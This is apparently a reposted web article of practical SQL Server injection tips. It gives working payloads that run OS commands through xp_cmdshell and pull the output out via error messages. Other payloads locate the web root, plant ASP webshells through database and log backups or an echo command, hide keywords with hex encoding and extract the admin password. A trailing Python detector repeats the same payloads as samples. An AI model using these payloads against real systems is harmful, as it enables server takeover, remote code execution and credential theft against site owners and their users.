SQL Server Injection Tips

Source: Internet
Author: User
Tags: mssql, sql server, injection

I. With sa privileges you can execute commands; how do you get the results back more quickly?

[Figures: an injection point with a display column, and the display column itself]

In fact, the key here is not whether there is a display column. EXEC master..xp_cmdshell 'systeminfo' produces many rows once its output is written into a table, and what we want is to get all of those rows out through the display column, or through a single error message, in one go. So the key is merging the multiple lines into one.

Method ①

02 BEGIN
03     if EXISTS (select table_name from information_schema.tables where table_name='test_1') drop table test_1;
04     if EXISTS (select table_name from information_schema.tables where table_name='test_2') drop table test_2;
05     create TABLE test_1([output] [varchar](1000));
06     insert test_1 exec master.dbo.xp_cmdshell 'ipconfig /all';
07     DECLARE @result varchar(8000)
08     SET @result='~'
09     select @result=@result+' '+output from test_1 where output>''
10     select @result as result into test_2;
11     SELECT convert(int,(select result from test_2));
12 END;

Analysis:
Lines 6-9 declare a temporary variable @result and set its initial value to '~'; the rows of test_1 are then walked in order (the condition is output>''), and each row is concatenated onto the string with a space as separator, so that the whole output ends up in @result.
@result is then given the alias result and inserted into test_2.
Finally the error message echoes it back: convert(int, ...) on a non-numeric string raises a conversion error that contains the string.
PS:
MSSQL compares letters case-insensitively.
MSSQL string comparison (ordering) works on the same principle as strcmp() in C.

Method ② (tested successfully on an injection point; test platform SQL Server 2008, 10.0.1600.22 (X64)):

Error-based:   AND (SELECT * FROM test_1 FOR XML PATH(''))=1--
Display-based: UNION SELECT 1,(SELECT * FROM test_1 FOR XML PATH(''))--

II. How to quickly find the site directory (sa user)

[Figures: sa with the service account's privileges lowered, and sa without them lowered]

Here it makes sense to distinguish whether the service account's privileges have been lowered or not. If they have not been lowered, the privileges are high enough to read the site path out of the local configuration; if they have been lowered, you can use the dir command to search for it.

Method ① (privileges lowered; personally tested successfully):

CREATE TABLE test_1([output] [varchar](1000));
INSERT test_1 EXEC master.dbo.xp_cmdshell 'dir /s d:\web.config';
AND (SELECT * FROM test_1 FOR XML PATH(''))=1;

Method ② (privileges not lowered, running as SYSTEM; personally tested successfully):

CREATE TABLE test_1([output] [varchar](1000));
INSERT test_1 EXEC master.dbo.xp_cmdshell 'cscript.exe C:\Inetpub\AdminScripts\adsutil.vbs ENUM W3SVC/1/root';
AND (SELECT * FROM test_1 FOR XML PATH(''))=1;

Method ③ (sa + SYSTEM privileges, IIS 7.0 / IIS 7.5):

%systemroot%\system32\inetsrv\appcmd.exe list site    -- lists the web sites

%systemroot%\system32\inetsrv\appcmd.exe list vdir    -- lists the physical path of each web site

PS: %systemroot% stands for C:\Windows\

III. How to get a shell through the injection point

Method ① (differential backup); personally tested successfully; does not require sa privileges and can be tried on injection points that are not sa

if EXISTS (select TABLE_NAME from INFORMATION_SCHEMA.TABLES where table_name='test_tmp') drop table test_tmp;
backup database XFData to disk='D:\WebRoot\asp.bak';
create table [dbo].[test_tmp] ([cmd] [image]);
insert into test_tmp(cmd) values(0x3C25657865637574652872657175657374282261222929253E);
backup database XFData to disk='D:\WebRoot\asp.asp' WITH DIFFERENTIAL, FORMAT;

Method ② (log backup); personally tested successfully; does not require sa privileges and can be tried on injection points that are not sa

if EXISTS (select TABLE_NAME from INFORMATION_SCHEMA.TABLES where table_name='test_tmp') drop table test_tmp;
alter database XFData set RECOVERY FULL;
create table test_tmp (a image);
backup log XFData to disk='D:\WebRoot\asp.bak' with init;
insert into test_tmp (a) values(0x3C25657865637574652872657175657374282261222929253EDA);
backup log XFData to disk='D:\webroot\123.asp';

PS:
If the backup fails, it is probably an access-rights problem; try a different directory.
If the table already exists the method fails, so first check whether the table exists and drop it if it does.

Method ③ (echo a one-line webshell); sa privileges + write permission for the current user; personally tested successfully

1 echo ^<%eval request("pass")%^> >D:\%D1%A7%B7%D6%CF%B5%CD%B3\WebRoot\update.asp

PS: Because this is an injection point, you need to pay attention to encoding. In general the page encoding and the database encoding are consistent (if they are not, I lose). Here I use a Chinese path as the illustration.

IV. How to avoid using keywords such as select

Method ①: hex obfuscation

;DECLARE @S VARCHAR(4000) SET @S=CAST(0x44524f50205441424c4520544d505f44423b AS VARCHAR(4000)); EXEC(@S);--

V. How to get the back-end password fastest when injecting at the login point
1' HAVING 1=1--                     # reveals the table name

1' GROUP BY username HAVING 1=1--   # reveals the column names

# User_Mess.Account

# User_Mess.PWD

1';select/**/convert(int,(select/**/top/**/1/**/Account/**/from/**/User_Mess))--
1';select/**/convert(int,(select/**/top/**/1/**/PWD/**/from/**/User_Mess/**/where/**/Account='admin'))--
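As an added example that is not part of the original article, the following Python scanner runs the detections a defender would write for the techniques in sections I, III, IV and V over statement text (as captured by a SQL audit or query log); the pattern names and the sample statements are constructed here, not taken from the page.

```python
# Added example, not from the original article: a defender-side scan of
# SQL Server statement text for the techniques this page describes.
# The 0x... literal trick from section IV is decoded before matching so
# obfuscated keywords are still caught, and the /**/ spacing from
# section V is normalised away.
import re

PATTERNS = {
    "xp_cmdshell":           re.compile(r"xp_cmdshell", re.I),
    "forxml_row_concat":     re.compile(r"for\s+xml\s+path\s*\(\s*''\s*\)", re.I),
    "convert_int_echo":      re.compile(r"convert\s*\(\s*int\s*,\s*\(\s*select\b", re.I),
    "backup_to_script_file": re.compile(
        r"backup\s+(database|log)\b.*\bto\s+disk\s*=\s*'[^']*\.(asp|aspx|php)'", re.I),
    "having_probe":          re.compile(r"(group\s+by\s+\w+\s+)?having\s+1\s*=\s*1", re.I),
    "hex_literal_cast":      re.compile(r"cast\s*\(\s*0x[0-9a-f]+\s+as\s+varchar", re.I),
    "drop_table":            re.compile(r"drop\s+table", re.I),
}

def decode_hex_literals(sql):
    """ASCII decoding of every 0x... literal in the statement (section IV trick)."""
    decoded = []
    for hexstr in re.findall(r"0x([0-9a-fA-F]+)", sql):
        try:
            decoded.append(bytes.fromhex(hexstr).decode("latin-1"))
        except ValueError:  # odd number of digits: not a byte string
            pass
    return decoded

def normalize(sql):
    """Undo /**/ whitespace substitution and append the decoded hex literals."""
    return sql.replace("/**/", " ") + " " + " ".join(decode_hex_literals(sql))

def scan(sql):
    """Names of all patterns that fire on one statement, in PATTERNS order."""
    text = normalize(sql)
    return [name for name, rx in PATTERNS.items() if rx.search(text)]

def scan_log(lines):
    """(line index, hits) for every statement with at least one hit."""
    return [(i, scan(line)) for i, line in enumerate(lines) if scan(line)]

# Constructed sample statements mirroring the page's snippets; not real traffic.
SAMPLE_LOG = [
    "SELECT name FROM products WHERE id = 42",
    "insert test_1 exec master.dbo.xp_cmdshell 'ipconfig /all'",
    "AND (SELECT * FROM test_1 FOR XML PATH(''))=1--",
    "backup database XFData to disk='D:\\WebRoot\\asp.asp' WITH DIFFERENTIAL,FORMAT",
    "DECLARE @S VARCHAR(4000) SET @S=CAST(0x44524f50205441424c4520544d505f44423b "
    "AS VARCHAR(4000)); EXEC(@S);--",
    "1' GROUP BY username HAVING 1=1--",
    "1';select/**/convert(int,(select/**/top/**/1/**/Account/**/from/**/User_Mess))--",
]
```

The first sample line is benign and produces no hit; `drop_table` on its own is only informational, but it fires here because the decoded hex literal reads DROP TABLE TMP_DB;.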
